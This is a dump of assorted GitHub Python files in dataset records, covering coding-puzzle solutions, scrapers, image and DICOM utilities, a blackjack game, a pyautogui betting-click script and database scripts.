Solution:\n# def minSubArrayLen(self, s, nums):\n# \"\"\"\n# :type s: int\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# _min = 0xffffffff\n# if sum(nums) < s:\n# return 0\n# length = len(nums)\n# for i in range(length):\n# for j in range(i + 1, length + 1):\n# cur_sum = sum(nums[i:j])\n# if cur_sum >= s:\n# _min = min(_min, j - i)\n# break\n# return _min\n","repo_name":"goalong/lc","sub_path":"v2/209.py","file_name":"209.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"41782052680","text":"import pandas as pd\nimport login_data\n\ndef getURLsPD(subreddit, time=\"week\", reddit_read_only=login_data.reddit_read_only , limit=10) -> pd.DataFrame:\n output = pd.DataFrame()\n \n subreddit = reddit_read_only.subreddit(subreddit)\n posts = subreddit.top(time, limit=limit)\n posts_dict = {\"Title\": [], \"Post Text\": [],\n \"ID\": [], \"Score\": [],\n \"Total Comments\": [], \"Post URL\": []\n }\n for post in posts:\n posts_dict[\"Title\"].append(post.title)\n posts_dict[\"Post Text\"].append(post.selftext)\n posts_dict[\"ID\"].append(post.id) \n posts_dict[\"Score\"].append(post.score)\n posts_dict[\"Total Comments\"].append(post.num_comments)\n posts_dict[\"Post URL\"].append(post.url)\n top_posts = pd.DataFrame(posts_dict)\n output=pd.concat([output, top_posts], ignore_index=True)\n \n return output\n\n\n#top_posts=getURLsPD(\"Eyebleach\")\n\n#print(top_posts)\n\n","repo_name":"andrismrnvszki/redditApiThingy","sub_path":"gatherURLs.py","file_name":"gatherURLs.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5166757289","text":"# -*- coding: utf-8 -*-\n#\n# Test\n# Author: alex\n# Created Time: 2018年12月09日 星期日 20时25分48秒\nimport os\nimport cv2\nimport time\nimport face_lib\n\n\ndef path_detect(path, model_algo):\n filenames = sorted(os.listdir(path))\n files = []\n # face detection\n start = time.time()\n count = 0\n print('face detection...')\n for fn in filenames:\n if fn.endswith(('jpg', 'jpeg', 'png')) is False:\n continue\n count += 1\n image = cv2.imread(os.path.join(path, fn))\n locations, confidences = 
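The minSubArrayLen record above explains the technique in Chinese comments: a two-pointer sliding window, where the right pointer extends the window until the running sum reaches s, then the left pointer shrinks it while recording the best length, so each element is visited at most twice. A compact standalone sketch of that same O(n) idea (my own version, not the author's exact code):

def min_subarray_len(s, nums):
    # Grow the window with `right`; shrink from `left` once the sum reaches s.
    best = float('inf')
    left = window_sum = 0
    for right, value in enumerate(nums):
        window_sum += value
        while window_sum >= s:
            best = min(best, right - left + 1)
            window_sum -= nums[left]
            left += 1
    return 0 if best == float('inf') else best

print(min_subarray_len(7, [2, 3, 1, 2, 4, 3]))  # -> 2, the subarray [4, 3]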
face_lib.detect(image, model=model_algo)\n if len(locations) > 0:\n encodings = face_lib.encode(image, locations)\n files.append((fn, locations, encodings,\n max(confidences), confidences))\n print(fn, locations, confidences)\n\n print('===> ', time.time()-start, ' image count: ', count)\n\n # 判断前后图片的人脸距离\n compare_before_face(files)\n return\n\n # face recognition\n print('face recognition...')\n faces = []\n faces_files = []\n\n # find the best image\n score = 0\n for fn, locations, encodings, _, confidences in files:\n tmp_score = sum(confidences)\n if tmp_score > score:\n score = tmp_score\n faces = encodings\n annotate = ['Face'+chr(ord('A')+i) for i in range(len(faces))]\n faces_files = [(fn, locations, annotate)]\n\n print('The best face: ', faces_files[0][0])\n faces = [[f] for f in faces]\n\n # files = sorted(files, key=lambda x: x[3], reverse=True)\n new_confidence = 0.7 if model_algo == 'dnn' else 1\n for fn, locations, encodings, _, confidences in files:\n if len(faces) == 0:\n faces = encodings\n annotate = ['Face'+chr(ord('A')+i) for i in range(len(faces))]\n faces_files = [(fn, locations, annotate)]\n continue\n\n has_new_face = False\n annotate = []\n for encoding, confidence in zip(encodings, confidences):\n distance, face_index = cal_distinces(faces, encoding)\n print(fn, face_index, distance)\n if distance < 0.50: # 不是新face\n if distance > 0.40:\n faces[face_index].append(encoding)\n annotate.append('Face'+chr(ord('A')+face_index))\n continue\n if confidence < new_confidence:\n continue\n print('new face in ', fn, ' distance: ', distance)\n has_new_face = True\n annotate.append('Face'+chr(ord('A')+len(faces)))\n faces.append([encoding])\n\n if has_new_face:\n faces_files.append((fn, locations, annotate))\n\n # show images\n print('show images...')\n print('total face image count:', len(faces_files))\n print('new face count: ', len(faces))\n for fn, locations, annotate in faces_files:\n print(fn, locations)\n image = cv2.imread(os.path.join(path, fn))\n show_image(image, locations, annotate)\n\n\ndef cal_distinces(faces, face):\n distances = []\n for group in faces:\n tmp_distances = face_lib.distance(group, face)\n distance = min(tmp_distances)\n distances.append(distance)\n\n min_distance = min(distances)\n return min_distance, distances.index(min_distance)\n\n\ndef compare_before_face(files):\n print('判断前后图片的人脸距离')\n before_faces = files[0][2]\n before_locs = files[0][1]\n for fn, locations, encodings, _, confidences in files:\n has_new_face = False\n for face, loc in zip(encodings, locations):\n distances = face_lib.distance(before_faces, face)\n min_distance = min(distances)\n index = distances.tolist().index(min_distance)\n loc_dis = sum([abs(p1[0]-p2[0]) + abs(p1[1]-p2[1])\n for p1, p2 in zip(loc, before_locs[index])])\n print('--> ', index, min_distance, loc_dis)\n if min_distance > 0.5:\n print('new face: ', min_distance, index)\n has_new_face = True\n\n print(fn, locations, confidences)\n before_locs = locations\n before_faces = encodings\n\n\ndef show_image(image, locations, annotate, wait=0):\n for ((left, top), (right, bottom)), anno in zip(locations, annotate):\n cv2.rectangle(image, (left, top),\n (right, bottom), (0, 255, 0))\n labelSize, baseLine = cv2.getTextSize(anno, cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, 1)\n\n cv2.rectangle(image, (left, top - labelSize[1]),\n (left + labelSize[0], top + baseLine),\n (255, 255, 255), cv2.FILLED)\n cv2.putText(image, anno, (left, top),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))\n\n cv2.imshow(\"detect\", image)\n 
cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n import sys\n path_detect(sys.argv[2], sys.argv[1])\n","repo_name":"cyy0523xc/face_lib","sub_path":"tests/face_test.py","file_name":"face_test.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5251102109","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport MySQLdb\nimport MySQLdb.cursors\nfrom datetime import date\nfrom twisted.enterprise import adbapi\nfrom scrapy import log\nfrom scrapy.pipelines.files import FilesPipeline\nfrom scrapy import Request\nfrom Crawler.items import SSEPostItem\n\n\nclass PostPipeline(object):\n def __init__(self):\n self.dbpool = adbapi.ConnectionPool('MySQLdb',\n host='127.0.0.1',\n db='post',\n user='root',\n passwd='passw0rd',\n cursorclass=MySQLdb.cursors.DictCursor,\n charset='utf8',\n use_unicode=True\n )\n\n\nclass GubaPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"GubaSpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into guba (stock_id, url, title, username, content, created_time, updated_time, '\n ' read_count, comment_count)'\n + 'values (%s, %s, %s, %s, %s, %s, %s,'\n ' %s, %s)',\n (item['stock_id'],\n item['url'],\n ''.join(item['title']),\n ''.join(item['username']),\n ''.join(item['content']),\n item['created_time'],\n item['updated_time'],\n item['read_count'],\n item['comment_count'],\n #item['thumbup_count'],\n # item['forward_count'][0],\n # item['share_count'][0],\n # item['favourite_count'][0]\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass XueqiuPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"XueqiuSpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into xueqiu (stock_id, title, username, content, created_time,'\n ' comment_count, donate_count, forward_count, favourite_count)'\n + 'values (%s, %s, %s, %s, %s,'\n ' %s, %s, %s, %s)',\n (item['stock_id'],\n item['title'],\n item['username'],\n item['content'],\n item['created_time'],\n # item['updated_time'],\n item['comment_count'],\n item['donate_count'],\n item['forward_count'],\n item['favourite_count']\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass SSEPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"SSESpider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into sse (stock_id, url, title, created_time)'\n + 'values (%s, %s, %s, %s)',\n (item['stock_id'],\n item['url'],\n item['title'],\n item['created_time']\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n\nclass SSEPdfPipeline(FilesPipeline):\n def get_media_requests(self, item, info):\n if isinstance(item, SSEPostItem):\n for file in item['file_urls']:\n yield Request(url=file['file_url'], meta={'file': file})\n\n def file_path(self, request, response=None, info=None):\n # return request.meta['file']['file_name']\n return 
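face_test.py above groups faces by comparing each new encoding against every stored group and treating a distance below 0.5 as the same person (with the 0.4-0.5 band used to enrich an existing group). A minimal standalone version of that matching rule, using a plain numpy Euclidean distance in place of face_lib.distance (an assumption; the library's actual metric may differ):

import numpy as np

def match_face(groups, encoding, threshold=0.5):
    # Return the index of the closest known group, or None if this is a new face.
    best_idx, best_dist = None, threshold
    for idx, group in enumerate(groups):
        dist = min(np.linalg.norm(np.asarray(e) - np.asarray(encoding)) for e in group)
        if dist < best_dist:
            best_idx, best_dist = idx, dist
    return best_idx

print(match_face([[[0.0, 0.0]], [[1.0, 1.0]]], [0.9, 1.1]))  # -> 1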
date.today().strftime('%Y%m%d') + '/' + request.meta['file']['file_name']\n\n\nclass SSEAnnouncementPostPipeline(PostPipeline):\n def process_item(self, item, spider):\n if spider.name != \"SSE_Announcement_Spider\":\n return item\n query = self.dbpool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n\n def _conditional_insert(self, tx, item):\n tx.execute(\n 'insert into sse_announcement (stock_id, url, title, content, created_time)'\n + 'values (%s, %s, %s, %s, %s)',\n (item['stock_id'],\n item['url'],\n item['title'],\n ''.join(item['content']),\n item['created_time'],\n )\n )\n\n def handle_error(self, e):\n log.err(e)\n\n","repo_name":"smilezjw/Guba_Xueqiu_Crawler","sub_path":"Crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"11982230059","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"options.py: Geniac CMake option class\"\"\"\n\nimport logging\nimport re\nimport shutil\nimport os\nfrom pathlib import Path\n\nfrom geniac.cli.commands.init import GeniacInit\n\n__author__ = \"Fabrice Allain\"\n__copyright__ = \"Institut Curie 2020\"\n\n_logger = logging.getLogger(__name__)\n\n\nclass GeniacClean(GeniacInit):\n \"\"\"Geniac CMake Recipes class\"\"\"\n\n def __init__(\n self,\n *args,\n src_path: str = None,\n **kwargs,\n ):\n \"\"\"Init flags specific to GRecipes command\"\"\"\n super().__init__(\n *args, src_path=src_path, post_clean=True, init_build=False, **kwargs\n )\n\n def clean_build(self):\n \"\"\"Clean build directory\"\"\"\n\n build_dir = self.working_dirs[\"build\"].as_posix()\n if os.path.isdir(build_dir):\n shutil.rmtree(build_dir)\n os.mkdir(build_dir)\n self.info(\"The folder '%s' has been cleaned.\", build_dir)\n\n def run(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n self.clean_build()\n","repo_name":"bioinfo-pf-curie/geniac","sub_path":"src/geniac/cli/commands/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"9527217568","text":"# When provided with a String, capitalize all vowels\n\n# For example:\n\n# Input : \"Hello World!\"\n\n# Output : \"HEllO WOrld!\"\n\n# Note: Y is not a vowel in this kata.\n\ndef swap(str):\n vowels = ['a', 'e', 'i', 'o', 'u']\n result = ''\n for x in str:\n if x.lower() in vowels:\n result += x.upper()\n else:\n result += x\n return result\n\n# print (swap(\"HelloWorld!\"), \"HEllOWOrld!\")","repo_name":"k-henningson/Coding-Challenges","sub_path":"OOP/changing_letters/changing_letters.py","file_name":"changing_letters.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585262601","text":"import math\n\nT = int(input())\n\nfor i in range(T):\n\tN, K = [int(i) for i in input().split()]\n\n\tpankakes = []\n\n\tmaxR = 0\n\n\tfor j in range(N):\n\t\tri, hi = [int(i) for i in input().split()]\n\t\tif ri > maxR:\n\t\t\tmaxR = ri\n\t\tpankakes.append((ri, hi))\n\n\tpankakes.sort(key=lambda p:p[0], reverse=True)\n\n\tbest_result = 0\n\n\n\tfor p in range(1+N-K):\n\t\tresult = math.pi*(pankakes[p][0]**2) + 2 * math.pi * pankakes[p][0] * pankakes[p][1]\n\t\tcopy = list(pankakes)\n\t\tcopy = copy[p+1:]\n\t\tcopy.sort(key=lambda p: p[0]*p[1], reverse=True)\n\n\t\tfor o in range(K-1):\n\t\t\tresult += 2 * math.pi * 
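changing_letters.py above uppercases vowels one character at a time; for ASCII input the same behavior fits in a single str.translate call (an equivalent sketch, not the kata author's solution):

def swap(text):
    # Map each lowercase vowel to uppercase; everything else passes through.
    return text.translate(str.maketrans('aeiou', 'AEIOU'))

print(swap('Hello World!'))  # -> 'HEllO WOrld!'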
copy[o][0] * copy[o][1]\n\t\t\t\n\t\tif result > best_result:\n\t\t\tbest_result = result\n\n\tprint(\"Case #{}: \".format(i+1)+str(best_result))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/131.py","file_name":"131.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2038026230","text":"import os\nimport socket\n\nimport numpy\nfrom PIL import Image, ImageQt, ImageEnhance\nfrom PySide6.QtGui import QImage, QPixmap\nfrom pydicom import Dataset\nfrom pydicom import dcmread\nfrom pydicom.charset import python_encoding\n\nfrom datetime import datetime\n\n\ndef _get_lut_value(data, window, level):\n \"\"\"\n Apply the RGB Look-Up Table for the given\n data and window/level value.\n Magic code from pydicom example. Do not touch!\n \"\"\"\n return numpy.piecewise(data,\n [data <= (level - 0.5 - (window - 1) / 2),\n data > (level - 0.5 + (window - 1) / 2)],\n [0, 255, lambda data: ((data - (level - 0.5)) /\n (window - 1) + 0.5) * (255 - 0)])\n\n\ndef _get_pil_image(dataset: Dataset) -> Image:\n \"\"\"\n Get Image object from Python Imaging Library(PIL)\n Magic code from pydicom example. Do not touch!\n \"\"\"\n if 'PixelData' not in dataset:\n raise TypeError(\"Cannot show image -- DICOM dataset does not have \"\n \"pixel data\")\n # can only apply LUT if these window info exists\n if ('WindowWidth' not in dataset) or ('WindowCenter' not in dataset):\n bits = dataset.BitsAllocated\n samples = dataset.SamplesPerPixel\n if bits == 8 and samples == 1:\n mode = \"L\"\n elif bits == 8 and samples == 3:\n mode = \"RGB\"\n elif bits == 16:\n # not sure about this -- PIL source says is 'experimental'\n # and no documentation. 
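The Code Jam solution above scores a pancake stack as the base disc's top area plus its side, pi*r**2 + 2*pi*r*h, and then adds only the exposed side 2*pi*r*h of each narrower pancake placed on top (the top view always shows pi*R**2 of the widest disc). A quick worked check of that formula (my own sanity test, not contest code):

import math

def stack_area(base, extras):
    # base and extras are (radius, height) pairs; extras must be narrower.
    r, h = base
    total = math.pi * r * r + 2 * math.pi * r * h
    total += sum(2 * math.pi * er * eh for er, eh in extras)
    return total

print(stack_area((3, 2), [(2, 5)]))  # 9*pi + 12*pi + 20*pi = 41*pi ~= 128.81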
Also, should bytes swap depending\n # on endian of file and system??\n mode = \"I;16\"\n else:\n raise TypeError(\"Don't know PIL mode for %d BitsAllocated \"\n \"and %d SamplesPerPixel\" % (bits, samples))\n\n # PIL size = (width, height)\n size = (dataset.Columns, dataset.Rows)\n\n # Recommended to specify all details\n # by http://www.pythonware.com/library/pil/handbook/image.htm\n image = Image.frombuffer(mode, size, dataset.PixelData,\n \"raw\", mode, 0, 1)\n\n else:\n ew = dataset['WindowWidth']\n ec = dataset['WindowCenter']\n # noinspection PyUnresolvedReferences\n ww = int(ew.value[0] if ew.VM > 1 else ew.value)\n # noinspection PyUnresolvedReferences\n wc = int(ec.value[0] if ec.VM > 1 else ec.value)\n image = _get_lut_value(dataset.pixel_array, ww, wc)\n # Convert mode to L since LUT has only 256 values:\n # http://www.pythonware.com/library/pil/handbook/image.htm\n # im = PIL.Image.fromarray(image).convert('L') # Grey (from manual)\n image = Image.fromarray(image).convert('RGB') # color\n\n return image\n\n\ndef get_pixmap_from(dataset: Dataset) -> QPixmap:\n \"\"\" Return QT5 QPixmap from DICOM dataset\"\"\"\n image = _get_pil_image(dataset)\n # image = _process(image)\n data = image.tobytes(\"raw\", \"RGB\")\n qim = QImage(data, image.size[0], image.size[1], QImage.Format_RGB888)\n return QPixmap(qim)\n\n\ndef tune(pil_img: ImageQt, brightness, contrast, sharpness) -> QPixmap:\n sh = float(sharpness) / 100\n br = float(brightness) / 100\n co = float(contrast) / 100\n tmp_img = ImageEnhance.Sharpness(pil_img).enhance(sh)\n tmp_img = ImageEnhance.Brightness(tmp_img).enhance(br)\n tmp_img = ImageEnhance.Contrast(tmp_img).enhance(co)\n return ImageQt.toqpixmap(tmp_img)\n\n\ndef tune_qpixmap(pixmap: QPixmap, brightness, contrast, sharpness) -> QPixmap:\n return tune(ImageQt.fromqpixmap(pixmap), brightness, contrast, sharpness)\n\n\ndef try_port(port: int) -> bool:\n \"\"\" Return True if *port* free \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = False\n try:\n sock.bind((\"0.0.0.0\", port))\n result = True\n except Exception as e:\n log_to_file('Port {} is busy.'.format(port))\n log_to_file(e)\n finally:\n sock.close()\n return result\n\n\ndef decode_rus(s: str, dataset: Dataset) -> str:\n # исправляем кодировку на русскую\n result = bytes(s, python_encoding[str(dataset.SpecificCharacterSet)]) \\\n .decode(python_encoding['ISO_IR 144']) # for Russian\n # если строка повторяется, то берем половину\n left = result[:len(result) // 2]\n right = result[len(result) // 2:len(result)]\n if left == right:\n result = left\n return result\n\n\ndef log_to_file(message: str):\n log_path = './errors.log'\n with open(log_path, \"a\" if os.path.isfile(log_path) else \"w\") as log_file:\n log_file.write('{}: {}\\n'.format(datetime.now(), message))\n\n\nif __name__ == '__main__':\n im = _get_pil_image(dcmread('../test_scu/dcm/27.dcm'))\n im.save('./27.jpg')\n","repo_name":"tripsin/sonoprint","sub_path":"sonoprint/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29713972866","text":"import random\nimport time\nimport sys\nfrom art import logo\ndef s_player_cards():\n \"\"\"Sum of player's cards\"\"\"\n sum_p_cards = 0\n return sum(p_cards)\ndef s_dealer_cards():\n \"\"\"Sum of dealer's cards\"\"\"\n sum_d_cards = 0\n return sum(d_cards)\ndef check_final_score(s_p_cards, s_d_cards):\n \"\"\"Checking the score, needs update\"\"\"\n if 
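_get_lut_value above is the standard DICOM window/level mapping: pixels at or below level - window/2 clip to 0, pixels above level + window/2 clip to 255, and the band in between scales linearly. A small numeric illustration with made-up values (the -0.5 and window-1 offsets follow the snippet, which mirrors the DICOM convention):

import numpy as np

def lut(data, window, level):
    # Same piecewise window/level mapping as the snippet, reduced to essentials.
    return np.piecewise(
        data,
        [data <= (level - 0.5 - (window - 1) / 2),
         data > (level - 0.5 + (window - 1) / 2)],
        [0, 255, lambda d: ((d - (level - 0.5)) / (window - 1) + 0.5) * 255])

print(lut(np.array([0.0, 40.0, 80.0]), window=80, level=40))  # [0. ~129. 255.]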
s_dealer_cards() > s_player_cards():\n        return \"You lost\"\n    elif s_player_cards() > s_dealer_cards():\n        return \"You win\"\n    else:\n        return \"It's a tie! You're lucky this time\"\ndef check_player_score(s_player_cards):\n    if s_player_cards() > 21:\n        return \"You went over 21. You lost!\"\n    else:\n        return s_player_cards()\ndef ace(s_player_cards,p_cards):\n    \"\"\"Function to verify when an ace is 11 or 1\"\"\"\n    if s_player_cards() > 21:\n        for i in range(0,len(p_cards)):\n            if p_cards[i] == 11:\n                if s_player_cards() - 10 > 21:\n                    return \"You lost!\"\n                else:\n                    return 0\ndef dealer_cards():\n    while sum(d_cards) < 17:\n        d_cards.append(random.choice(cards))\n        if sum(d_cards) > 17:\n            return d_cards\ndef blackjack(sum_dealer,sum_player):\n    if sum_player == 21:\n        return \"It's a blackjack. You win\"\n    elif sum_dealer == 21:\n        return \"I'm sorry. Blackjack to dealer. You lose!\"\n    else:\n        return 0\ncards = [11,2,3,4,5,6,7,8,9,10,10,10,10]\nprint(logo)\nwanna_play = input(\"Do you want to play a blackjack game? Type 'y' or 'n' \").strip()\nwanna_play = wanna_play.lower()\np_cards = random.sample(cards,2)\nd_cards = random.sample(cards,2)\nprint(f\"Your cards are {p_cards} , total = {s_player_cards()}\")\nprint(f\"Computer's first card is {d_cards[0]} \\n\")\nif blackjack(s_dealer_cards(),s_player_cards()) != 0:\n    print(blackjack(s_dealer_cards(),s_player_cards()))\n    sys.exit()\nget_card = input(\"Do you want to get another card? Type 'y' or 'n' \").strip()\nwhile True:\n    if get_card == 'n':\n        break\n    if get_card == 'y':\n        p_cards.append(random.choice(cards))\n        if blackjack(s_dealer_cards(),s_player_cards()) != 0:\n            print(blackjack(s_dealer_cards(),s_player_cards()))\n            break\n        if ace(s_player_cards,p_cards) == \"You lost!\":\n            ace(s_player_cards,p_cards)\n        print(f\"Your cards are {p_cards} , total = {s_player_cards()} \\n\")\n        ace(s_player_cards,p_cards)\n        if check_player_score(s_player_cards) != s_player_cards():\n            dealer_cards()\n            print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\")\n        if check_player_score(s_player_cards) != s_player_cards():\n            print(check_player_score(s_player_cards))\n            break\n        if s_player_cards() < 21:\n            get_card = input(\"\\nDo you want to get another card? 
Type 'y' or 'n' \").strip()\n else:\n break\nif get_card == 'n':\n dealer_cards()\n s_dealer_cards()\n if s_dealer_cards() > 21:\n print(f\"Your final cards are {p_cards} , total is {s_player_cards()}\")\n print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\\n\")\n print(\"You win!\")\n else:\n print(f\"Your final cards are {p_cards} , total is {s_player_cards()}\")\n print(f\"Computer's final cards are {d_cards} , total is {s_dealer_cards()}.\\n\")\n time.sleep(1)\n print(check_final_score(s_player_cards,s_dealer_cards))\n \n\n\n\n\n\n \n \n \n \n\n\n\n\n\n\n\n\n","repo_name":"biscuitdelicious/Blackjack","sub_path":"main_game.py","file_name":"main_game.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16942729936","text":"class Queue:\n def __init__(self):\n self.item=[]\n\n def is_empty(self):\n return len(self.item) == 0\n\n def enqueue(self,data):\n self.item.append(data)\n\n def dequeue(self):\n if not self.is_empty():\n return self.item.pop(0)\n else:\n raise IndexError(\"list is empty\")\n def get_front(self):\n if not self.is_empty():\n return self.item[0]\n else:\n raise IndexError(\"list is empty\")\n def get_rear(self):\n if not self.is_empty():\n return self.item[-1]\n else:\n raise IndexError(\"list is empty\")\n def size(self):\n if not self.is_empty():\n return len(self.item)\n else:\n raise IndexError(\"list is empty\")\n\nq1=Queue()\nq1.enqueue(10)\nq1.enqueue(20)\nq1.enqueue(30)\nq1.enqueue(40)\nq1.enqueue(50)\nq1.enqueue(60)\nq1.enqueue(70)\nq1.enqueue(80)\nq1.dequeue()\nq1.dequeue()\nprint(\"front item of the queue :\",q1.get_front())\nprint(\"rear item of the queue :\",q1.get_rear())\nprint(\"size of the queue :\",q1.size())\n\n\n","repo_name":"GODZ-k/python_datastructure","sub_path":"queue_1.py","file_name":"queue_1.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7087656631","text":"import pyautogui\nfrom time import sleep\n##### bet info\nbankroll = '1.59'\npayout_amount = '99' # float(input('Payout Amount : '))\nbet_amount = '0.001' # float(input('Bet Amount : '))\nloss_increase_percentage = '1.025' # int(input('Percentage Increase on Loss : '))\n\n##### game location info zoom 50% chrome\n\nclassic_dice_seed_location = 500, 517 \nclassic_dice_new_seed = 302, 602\nclassic_dice_tab = 100, 40\nclassic_dice_bet_amount_location = 153, 236\nclassic_dice_start_location = 191, 526\n\nvault_tab = 300, 40\nvault_max = 385, 268\nvault_transfer = 345, 308\nvault_out = 375, 192\nvault_in = 275, 192\nvault_amount = 256, 267\n#####\ndef vault():\n pyautogui.click(vault_tab)\n sleep(1)\n pyautogui.click(vault_in)\n sleep(1)\n pyautogui.click(vault_max)\n sleep(1)\n pyautogui.click(vault_transfer)\n sleep(1)\n pyautogui.click(vault_out)\n sleep(1)\n pyautogui.doubleClick(vault_amount, interval=0.25)\n sleep(1)\n pyautogui.write(bankroll)\n sleep(1)\n pyautogui.click(vault_transfer)\n sleep(1)\ndef classicDice():\n pyautogui.click(classic_dice_tab)\n sleep(0.25)\n pyautogui.click(classic_dice_seed_location) \n sleep(2.5)\n pyautogui.click(classic_dice_new_seed)\n sleep(2)\n pyautogui.doubleClick(classic_dice_bet_amount_location, interval=0.15)\n sleep(0.25)\n pyautogui.write(bet_amount) \n sleep(0.25)\n pyautogui.click(classic_dice_start_location)\n sleep(1)\ndef main():\n vault()\n classicDice()\n sleep(110)\nwhile True:\n 
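The Queue class above implements dequeue with list.pop(0), which shifts every remaining element and is O(n) per call. collections.deque provides the same FIFO behavior with O(1) pops at both ends (an alternative sketch, not a drop-in for the author's class):

from collections import deque

class FastQueue:
    def __init__(self):
        self.items = deque()

    def enqueue(self, data):
        self.items.append(data)

    def dequeue(self):
        # popleft() is O(1); list.pop(0) would be O(n).
        if not self.items:
            raise IndexError('queue is empty')
        return self.items.popleft()

q = FastQueue()
q.enqueue(10)
q.enqueue(20)
print(q.dequeue())  # -> 10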
main()\n","repo_name":"findingprivacy/gamblr","sub_path":"opera.py","file_name":"opera.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72676550273","text":"import math\nfrom collections import Counter\n\nfile = open(\"liczby.txt\")\nnumbers = file.read().split()\nresults = open(\"wyniki4.txt\", \"w\")\nfile.close()\n\n\ndef isPrime(n):\n if n < 2:\n return False\n else:\n for i in range(2, int(math.sqrt(n))+1):\n if n%i == 0:\n return False\n return True\n \n\n#4.1\nresults.write(\"ZADANIE 4\\n\\nZadanie 4.1\\n\")\nfor lines in numbers:\n if int(lines[::-1])%17 == 0:\n results.write(f\"{lines.strip()[::-1]}\\n\")\n\n#4.2\nmax_diff = -1000000009\nmax_diff_number = 0\nfor lines in numbers:\n lines = lines.strip()\n diff = abs(int(lines) - int(lines[::-1]))\n if diff > max_diff:\n max_diff = diff\n max_diff_number = lines\n \nresults.write(f\"\\nZadanie 4.2\\n{max_diff_number} {max_diff}\\n\\n\")\n\n#4.3\nresults.write(\"Zadanie 4.3\\n\")\nfor lines in numbers:\n if isPrime(int(lines)) and isPrime(int(lines[::-1])):\n results.write(f\"{lines}\\n\")\n\n#4.4\nunique_numbers = []\nall_numbers = []\nfor lines in numbers:\n lines = lines.strip()\n all_numbers.append(int(lines))\n if lines not in unique_numbers:\n unique_numbers.append(lines)\n\ncounter_list = Counter(all_numbers) \ntwo_times = 0\nthree_times = 0 \nfor count in counter_list.values():\n if count == 2:\n two_times += 1\n elif count == 3:\n three_times += 1\n \nresults.write(f\"\\nZadanie 4.4\\n{len(unique_numbers)} {two_times} {three_times}\")\nprint(counter_list)\nresults.close()\n","repo_name":"zelazowska/matura_py","sub_path":"nowa_formula/2022/czerwiec22/zadanie4/liczby.py","file_name":"liczby.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11639704220","text":"from datetime import datetime\nfrom pymongo import MongoClient\n\n\nstartTime = datetime.now()\nprint(\"Started at\", startTime)\nclient = MongoClient()\ndb = client.twitter_data\nnodes = db.nodes\ncursor_nodes = db.nodes.find()\nnetworks = db.networks\nif networks.count() > 0:\n print(\"Dropping networks\", networks.count())\n networks.drop()\n\n\ndef network_size(_id):\n node = nodes.find({\"_id\": _id}).limit(1)[0]\n if node[\"children\"] is not None:\n n_descendants = len(node[\"children\"])\n for child in node[\"children\"]:\n n_descendants += network_size(child)\n else:\n n_descendants = 0\n return n_descendants\n\ncount = 0\nfor node in cursor_nodes:\n count += 1\n if count % 1000000 == 0:\n print(str(count) + ' out of ' + str(nodes.count()) + ' done.')\n print(\"The number of networks is\", networks.count())\n print(\"Now it's\", datetime.now())\n if node[\"parent\"] is not None:\n continue\n size = network_size(node[\"_id\"])\n network = {\"_id\": node[\"_id\"],\n \"n_descendants\": size\n }\n 